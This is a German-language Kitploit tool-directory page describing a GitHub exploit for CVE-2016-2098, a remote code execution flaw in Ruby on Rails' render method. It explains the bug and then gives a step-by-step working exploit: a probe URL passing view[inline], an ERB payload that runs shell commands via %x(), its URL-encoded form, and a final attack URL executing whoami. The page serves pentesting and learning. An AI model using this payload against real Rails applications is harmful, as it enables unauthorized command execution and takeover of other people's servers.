Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2016-2098 — Schwachstelle für Remote-Codeausführung in Ruby-on-Rails bei Verwendung von render mit benutzergelieferten Daten. | Kitploit
Tools/GitHubGitHub/j4k0m/cve-2016-2098
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubj4k0m/cve-2016-2098

CVE-2016-2098

Schwachstelle für Remote-Codeausführung in Ruby-on-Rails bei Verwendung von render mit benutzergelieferten Daten.

Repository anzeigen
4vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2016-2098

Sicherheitslücke für Remote-Codeausführung in Ruby-on-Rails bei Verwendung von render mit benutzerbereitgestellten Daten.

Erklärung:

Dieses Problem entsteht durch die Verwendung der render-Methode mit benutzerbereitgestellten Daten.

Die Methode render wird normalerweise verwendet, um eine Seite aus einer Vorlage zu rendern, aber die render-Methode erlaubt Entwicklern auch, Klartext (plaintext) und sogar Inline-Code (inline) zu rendern.

render-Funktion:

root@kitploit:~
# File actionpack/lib/abstract_controller/rendering.rb, line 23
def render(*args, &block)
  options = _normalize_render(*args, &block)
  rendered_body = render_to_body(options)
  if options[:html]
    _set_html_content_type
  else
    _set_rendered_content_type rendered_format
  end
  _set_vary_header
  self.response_body = rendered_body
end

Ausnutzungsbeispiel:

Ziel-URL:

root@kitploit:~
http://example.com/?view=test

Ausnutzung:

root@kitploit:~
http://example.com/?view[inline]=OK

Wenn im Quellcode 'OK' angezeigt wird, ist die Webanwendung anfällig für CVE-2016-2098.

Remote-Codeausführung

root@kitploit:~
<%= %x('[CMD]') %>

Wir können CMD durch unseren Befehl ersetzen, der ausgeführt werden soll.

root@kitploit:~
<%= %x('whoami') %>

Nach URL-Kodierung:

root@kitploit:~
%3C%25=%20%25x(whoami)%20%25%3E

Endgültig:

root@kitploit:~
http://example.com/?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E

Ressourcen:

  • https://guides.rubyonrails.org/layouts_and_rendering.html
Tool herunterladen